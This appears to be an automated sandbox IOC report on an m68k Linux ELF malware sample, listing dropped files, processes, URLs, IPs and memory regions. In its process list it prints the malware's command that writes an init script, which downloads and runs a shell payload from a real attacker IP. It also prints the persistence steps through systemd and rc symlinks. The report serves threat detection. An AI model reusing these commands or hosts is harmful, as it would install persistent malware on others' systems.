IOC Report
m68k.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
m68k.nn.elf
ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/m68k.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.NgO5at (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/m68k.nn.elf
/tmp/m68k.nn.elf
/tmp/m68k.nn.elf
-
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/m68k.nn.elf
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/m68k.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
/tmp/m68k.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/lib/systemd/systemd-user-runtime-dir
/lib/systemd/systemd-user-runtime-dir stop 127
There are 40 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
unknown
http://193.143.1.70/curl.sh
unknown
http://193.143.1.70/lol.sh
unknown
http://193.143.1.70/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
154.216.19.139
unknown
Seychelles

Memdumps

Base Address
Regiontype
Protect
Malicious
7f111401e000
page execute read
 malicious
7f111401e000
page execute read
 malicious
7f1114024000
page read and write
556f8d37c000
page read and write
556f8b2e7000
page read and write
556f8de51000
page read and write
7f119a7d3000
page read and write
7f119a536000
page read and write
7f119ab95000
page read and write
7f119af05000
page read and write
556f8d37c000
page read and write
556f8d2e5000
page execute and read and write
556f8b0ad000
page execute read
7f119abba000
page read and write
7f119b07b000
page read and write
556f8de51000
page read and write
7fff4deef000
page execute read
7fff4de0e000
page read and write
556f8b2e7000
page read and write
7f119b02e000
page read and write
7f119ab95000
page read and write
7fff4de0e000
page read and write
7f1194000000
page read and write
7f1199d33000
page read and write
7f1114029000
page read and write
7f119abba000
page read and write
7f119b07b000
page read and write
7f119af05000
page read and write
556f8b2df000
page read and write
7f1114020000
page read and write
7f1199d33000
page read and write
7f1114024000
page read and write
7f1194000000
page read and write
7f1194021000
page read and write
7fff4deef000
page execute read
7f119b036000
page read and write
7f119a536000
page read and write
7f1114020000
page read and write
7f119b02e000
page read and write
7f119a544000
page read and write
556f8d2e5000
page execute and read and write
7f119a544000
page read and write
556f8b2df000
page read and write
7f119a7d3000
page read and write
7f119b036000
page read and write
556f8b0ad000
page execute read
7f1194021000
page read and write
There are 37 hidden memdumps, click here to show them.